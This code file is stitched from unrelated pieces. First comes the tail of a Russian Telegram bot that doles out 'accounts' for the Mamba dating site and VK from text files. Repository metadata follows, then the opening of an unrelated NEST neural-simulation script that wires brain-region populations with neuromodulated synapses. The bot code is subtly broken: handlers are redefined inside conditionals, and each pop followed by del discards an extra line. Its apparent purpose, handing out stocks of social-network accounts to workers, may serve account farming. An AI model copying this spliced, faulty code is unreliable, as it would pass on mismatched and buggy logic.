f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Три")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('Три')
user_markup.row('Четыре')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Три")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Четыре")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
mamba3 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2)
bot.send_message(m.chat.id, mamba3, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (mamba3)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '0':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.chat.id, "Закончились", reply_markup=user_markup)
else:
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('Три')
user_markup.row('Четыре')
user_markup.row('Пять')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Три")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Четыре")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
mamba3 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2)
bot.send_message(m.chat.id, mamba3, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (mamba3)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Пять")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
mamba3 = a.pop (0)
del a[0]
mamba4 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, если ты справишься с ними... \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2)
bot.send_message(m.chat.id, mamba3)
bot.send_message(m.chat.id, mamba4, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (mamba3)
print (mamba4)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
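# Moscow VK stock (vk.txt): the same flow once more, with bare digits as button labels.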
@bot.message_handler(func=lambda message: message.text == "Получить вк МСК")
def handle_text(message):
#orig_vk = open('vkorig.txt', 'r+')
rab_vk = open('vk.txt', 'r+')
vk_list = (rab_vk.read())
vklist = vk_list.split('\n')
vk_proverka = [x for x in vklist if x != '']
vkresultat = str(len(vk_proverka))
print(vkresultat)
#ovk_list = (orig_vk.read())
#ovklist = ovk_list.split('\n')
#vkresult = []
#for index in vk_proverka:
# if index in ovklist:
# vkresult.append(index)
#print(vkresult)
#print(len(vkresult))
#vkresultat = str(len(vkresult))
if vkresultat == '1' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Последний, заберешь? ", reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Только две есть \nДаже докажу: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('3')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \n Это все, что есть: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "3")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('3')
user_markup.row('4')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОсталось: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "3")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "4")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk3 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2)
bot.send_message(m.chat.id, vk3, reply_markup=user_markup)
print (vk+" "+vk1+" "+vk2+" "+vk3)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '0' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.chat.id, "Больше нет, ждите, пока зальют.", reply_markup=user_markup)
else :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('3')
user_markup.row('4')
user_markup.row('5')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nВ сухом остатке у нас: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "3")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "4")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk3 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2)
bot.send_message(m.chat.id, vk3, reply_markup=user_markup)
print (vk+" "+vk1+" "+vk2+" "+vk3)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "5")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk3 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk4 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ого, а справишься?) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2)
bot.send_message(m.chat.id, vk3)
bot.send_message(m.chat.id, vk4, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2+' '+vk3+' '+vk4)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close()
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
if __name__ == "__main__":
bot.polling()
authors: ["makarishche@gmail.com"]
author: makarishche@gmail.com
blob_id: 1e84c539079a73cab67e9517c9c96f370c7348f8
directory_id: 4b8cde0ef35b67618eea421c20a7cf0c6882b75b
path: /motor-surprise-rage.py
content_id: 1b1a3ca04300174a8af7d846534b8936bad235e5
detected_licenses: []
license_type: no_license
repo_name: MeRuslan/thesis_work
snapshot_id: 57aa2006711e33db33d47b576a0cce047045fa66
revision_id: 935b15c611c65f77eae26c5d768ad3f363873832
branch_name: refs/heads/master
visit_date: 2021-01-21T21:06:58.803983
revision_date: 2017-06-19T13:35:12
committer_date: 2017-06-19T13:35:12
github_id: 94780166
star_events_count: 0
fork_events_count: 0
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 26085
extension: py
from func import *
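# func presumably supplies the imports (nest, logging, datetime), the neuron populations
# (ldt, thalamus, lc, ...), the *_synparams dictionaries, and the generate_neurons()/connect()
# helpers used below.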
# ATTENTION! There may be some mistakes in the neuron parameters!
logger = logging.getLogger('neuromodulation')
startbuild = datetime.datetime.now()
nest.ResetKernel()
nest.SetKernelStatus({'overwrite_files': True,
'local_num_threads': 8,
'resolution': 0.1})
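# 8 worker threads at 0.1 ms integration resolution; recorder files from earlier runs are overwritten.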
generate_neurons(1000)
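# Each modulated synapse model below needs its own volume_transmitter node: its GID is
# stored in the model's 'vt' parameter so the modulator population's spikes are
# broadcast to every synapse of that model.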
# Init parameters of our synapse models
DOPA_synparams_ex['vt'] = nest.Create('volume_transmitter')[0]
DOPA_synparams_in['vt'] = nest.Create('volume_transmitter')[0]
SERO_synparams_in['vt'] = nest.Create('volume_transmitter')[0]
SERO_synparams_ex['vt'] = nest.Create('volume_transmitter')[0]
NORA_synparams_ex['vt'] = nest.Create('volume_transmitter')[0]
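# Register named copies of the stock synapse models with our parameter dictionaries
# so connect() can select them by name.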
nest.CopyModel('static_synapse', gen_static_syn, static_syn)
nest.CopyModel('stdp_synapse', glu_synapse, STDP_synparams_Glu)
nest.CopyModel('stdp_synapse', gaba_synapse, STDP_synparams_GABA)
nest.CopyModel('stdp_synapse', ach_synapse, STDP_synparams_ACh)
nest.CopyModel('stdp_dopamine_synapse', dopa_synapse_ex, DOPA_synparams_ex)
nest.CopyModel('stdp_dopamine_synapse', dopa_synapse_in, DOPA_synparams_in)
nest.CopyModel('stdp_serotonin_synapse', sero_synapse_ex, SERO_synparams_ex)
nest.CopyModel('stdp_serotonin_synapse', sero_synapse_in, SERO_synparams_in)
nest.CopyModel('stdp_noradrenaline_synapse', nora_synapse_ex, NORA_synparams_ex)
## - my .50
logger.debug("* * * Start connection initialisation")
####################################################################
# * * * ventral pathway * * *
connect(ldt[ldt_Ach], thalamus[thalamus_Glu], syn_type=ACh, weight_coef=0.005)
connect(ldt[ldt_Ach], bnst[bnst_Ach], syn_type=ACh, weight_coef=0.005)
connect(ldt[ldt_Ach], lc[lc_N0], syn_type=ACh, weight_coef=0.005)
connect(ldt[ldt_Ach], prefrontal[pfc_Glu0], syn_type=ACh, weight_coef=0.005)
connect(thalamus[thalamus_Glu], motor[motor_Glu0], syn_type=Glu, weight_coef=0.005)
connect(thalamus[thalamus_Glu], motor[motor_Glu1], syn_type=Glu, weight_coef=0.005)
connect(thalamus[thalamus_Glu], motor[motor_5HT], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu0], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu1], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(prefrontal[pfc_Glu0], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(prefrontal[pfc_Glu1], bnst[bnst_Glu], syn_type=Glu, weight_coef=0.005)
connect(bnst[bnst_Glu], bnst[bnst_GABA], syn_type=Glu, weight_coef=0.005)
connect(bnst[bnst_Ach], amygdala[amygdala_Ach], syn_type=ACh, weight_coef=0.005)
connect(bnst[bnst_GABA], hypothalamus[hypothalamus_pvn_GABA], syn_type=GABA, weight_coef=0.005)
connect(amygdala[amygdala_Ach], lc[lc_Ach], syn_type=ACh, weight_coef=0.005)
connect(amygdala[amygdala_GABA], bnst[bnst_GABA], syn_type=GABA, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_D1], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_D2], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_tan], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_5HT], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_Ach], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_GABA], syn_type=Glu, weight_coef=0.005)
